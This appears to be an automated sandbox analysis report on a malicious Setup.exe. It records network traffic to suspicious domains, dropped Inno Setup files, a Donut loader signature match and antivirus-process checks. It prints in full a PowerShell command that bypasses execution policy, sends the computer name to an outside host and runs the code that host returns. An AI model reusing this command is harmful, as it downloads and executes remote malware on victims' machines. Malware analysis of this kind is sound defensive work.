              Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 112 | Host: abberanteusz.click
              Source: global traffic, HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: cegu.shop
              Source: global traffic, HTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: klipvumisui.shop
              Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic, DNS traffic detected: DNS query: abberanteusz.click
              Source: global traffic, DNS traffic detected: DNS query: cegu.shop
              Source: global traffic, DNS traffic detected: DNS query: klipvumisui.shop
              Source: global traffic, DNS traffic detected: DNS query: dfgh.online
              Source: unknown, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: abberanteusz.click
              Source: Setup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: powershell.exe, 00000002.00000002.1922557688.0000000005466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1922557688.0000000005B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: https://jrsoftware.org/
              Source: Setup.exe, 00000000.00000003.1914615254.0000000003A50000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1914700847.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.exe, 00000006.00000000.1971208181.0000000000841000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: https://jrsoftware.org0
              Source: Setup.exe, 00000000.00000003.1972142744.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/
              Source: Setup.exe, 00000000.00000003.1972142744.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1963580179.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1972142744.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1890502040.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
              Source: Setup.exe, 00000000.00000003.1972142744.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1963580179.00000000006D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtPE
              Source: Setup.exe, 00000000.00000003.1972142744.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1963580179.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1890502040.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtR3SF
              Source: Setup.exe, 00000000.00000003.1972142744.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1963580179.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1890502040.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtot
              Source: powershell.exe, 00000002.00000002.1928225704.000000000637B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: https://sectigo.com/CPS0D
              Source: Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.trustwave.com/CA03
              Source: Setup.exe, 00000000.00000003.1800048845.0000000003564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: Setup.exe, 00000000.00000003.1831025961.00000000035EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Setup.exe, 00000000.00000003.1831025961.00000000035EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Setup.exe, 00000000.00000003.1811874212.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1800281285.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1811481064.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1811650599.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1800162410.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1800048845.0000000003562000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Setup.exe, 00000000.00000003.1800162410.00000000034F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: Setup.exe, 00000000.00000003.1811874212.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1800281285.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1811481064.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1811650599.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1800162410.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1800048845.0000000003562000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Setup.exe, 00000000.00000003.1800162410.00000000034F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: https://www.certum.pl/CPS0
              Source: Setup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1799405459.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Setup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1799405459.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.exe, 00000006.00000003.1975272880.00000000032EF000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.exe, 00000006.00000003.1980668729.000000007EFCB000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000000.1984948438.00000000009E1000.00000020.00000001.01000000.00000009.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000000.2007747384.0000000000A7D000.00000020.00000001.01000000.0000000C.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.8.drString found in binary or memory: https://www.innosetup.com/
              Source: Setup.exe, 00000000.00000003.1831025961.00000000035EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Setup.exe, 00000000.00000003.1831025961.00000000035EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Setup.exe, 00000000.00000003.1831025961.00000000035EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Setup.exe, 00000000.00000003.1831025961.00000000035EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Setup.exe, 00000000.00000003.1831025961.00000000035EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.exe, 00000006.00000003.1975272880.00000000032EF000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.exe, 00000006.00000003.1980668729.000000007EFCB000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000000.1984948438.00000000009E1000.00000020.00000001.01000000.00000009.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000000.2007747384.0000000000A7D000.00000020.00000001.01000000.0000000C.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.8.drString found in binary or memory: https://www.remobjects.com/ps
              Source: unknown HTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.4:49745 version: TLS 1.2

              System Summary

              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Window found: window name: AutoHotkey
              Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_02070369 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_02070369
              Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe 16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
              Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\is-1RSR3.tmp\_isetup\_isdecmp.dll 31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
              Source: C:\Users\user\Desktop\Setup.exe Code function: String function: 02029726 appears 66 times
              Source: Setup.exe Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: Setup.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.6.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.8.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.8.dr Static PE information: Number of sections : 11 > 10
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.exe.0.dr Static PE information: Number of sections : 11 > 10
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.6.dr Static PE information: Number of sections : 11 > 10
              Source: Setup.exe, 00000000.00000000.1654892296.0000000000520000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Setup.exe
              Source: Setup.exe, 00000000.00000003.1770590161.0000000002BB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Setup.exe
              Source: Setup.exe, 00000000.00000003.1918294465.0000000003B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Setup.exe
              Source: Setup.exe, 00000000.00000003.1918368822.00000000039DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Setup.exe
              Source: Setup.exeBinary or memory string: OriginalFilenameshfolder.dll~/ vs Setup.exe
              Source: Setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@59/15@4/3
              Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_02020AB9 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_02020AB9
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp File created: C:\Users\user\AppData\Roaming\ColorStreamLib
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3336:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5924:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6064:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2816:120:WilError_03
              Source: C:\Users\user\Desktop\Setup.exe File created: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe
              Source: C:\Users\user\Desktop\Setup.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\Setup.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
              Source: Setup.exe, 00000000.00000003.1799770983.00000000034F5000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1811531947.00000000034D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Setup.exe Virustotal: Detection: 13%
              Source: Setup.exe ReversingLabs: Detection: 31%
              Source: Setup.exe String found in binary or memory: -Helper process exited with failure code: 0x%x
              Source: Setup.exe String found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
              Source: Setup.exe String found in binary or memory: /LoadInf=
              Source: Setup.exe String found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
              Source: C:\Users\user\Desktop\Setup.exe File read: C:\Users\user\Desktop\Setup.exe
              Source: unknownProcess created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
              Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe "C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe"
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe Process created: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp "C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp" /SL5="$20460,7785838,845824,C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Process created: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe "C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe Process created: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp "C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp" /SL5="$B0060,7785838,845824,C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Process created: C:\Windows\System32\timeout.exe "timeout" 9
              Source: C:\Windows\System32\timeout.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Process created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
